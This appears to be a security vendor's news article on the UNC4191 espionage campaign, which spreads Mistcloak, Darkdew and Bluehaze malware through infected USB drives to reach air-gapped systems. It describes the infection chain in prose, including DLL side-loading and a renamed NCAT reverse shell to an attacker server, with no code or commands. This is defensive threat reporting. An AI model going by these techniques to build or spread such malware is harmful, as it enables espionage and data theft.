HQ/EMEAFind out how we can help your business
Security researchers have observed a recent threat campaign performed by a China-backed APT group ‘UNC4191’, which uses malware that can self-replicate on USB drives to infect victims. This technique allows malicious actors to exfiltrate data from air-gapped systems.
Regions in Southeast Asia, Asia-Pacific, Europe, and the US were the prime targets of UNC4191 in this observed campaign. However, researchers have seen the Philippines as the most heavily targeted country, with threat actors deploying binaries with authentic signatures to propagate malware strains.
Some malware strains spread by UNC4191 include the Bluehaze launcher, the Mistcloak launcher, and the Darkdew dropper.
In the observed attack activities, the threat group deployed the NCAT command-line networking utility and a reverse shell towards the targeted computer, which could give them backdoor access.
Furthermore, the malware used in these attacks could self-replicate by infecting USB drives plugged into a compromised computer. Once completed, the malicious payloads could spread to additional systems and networks and collect critical data from the victims’ air-gapped systems.
UNC4191 begins the infection cycle through a user-connected infected removable drive or USB flash drive to a computer, which prompts the USB Network Gate app execution, eventually side-loading the Mistcloak launcher.
The Mistcloak malware is used for loading an INI file that subsequently contains the Darkdew dropper, which attains persistence and infects USB drives connected to the victim’s system.
On the other hand, the Bluhaze malware, deployed at the infection chain’s third phase, is used for launching a renamed NCAT executable that can create a reverse shell to a hardcoded attacker-controlled C2 server.
In a report released by a security analyst, they explained that there was no evidence of reverse shell interaction in the attack campaigns, although it could be possible that the activities’ age might have been the basis of visibility disparities or brief log retention periods.
The Philippines, a Southeast Asian country, could have been the most targeted region of this campaign following the number of affected systems identified within its territories.
Believed to have begun since last year of September, UNC4191’s attack campaign focuses on targeting public and private organisations for their cyberespionage activities. The experts also presume that the gang’s campaigns are linked to China’s political and commercial interests.
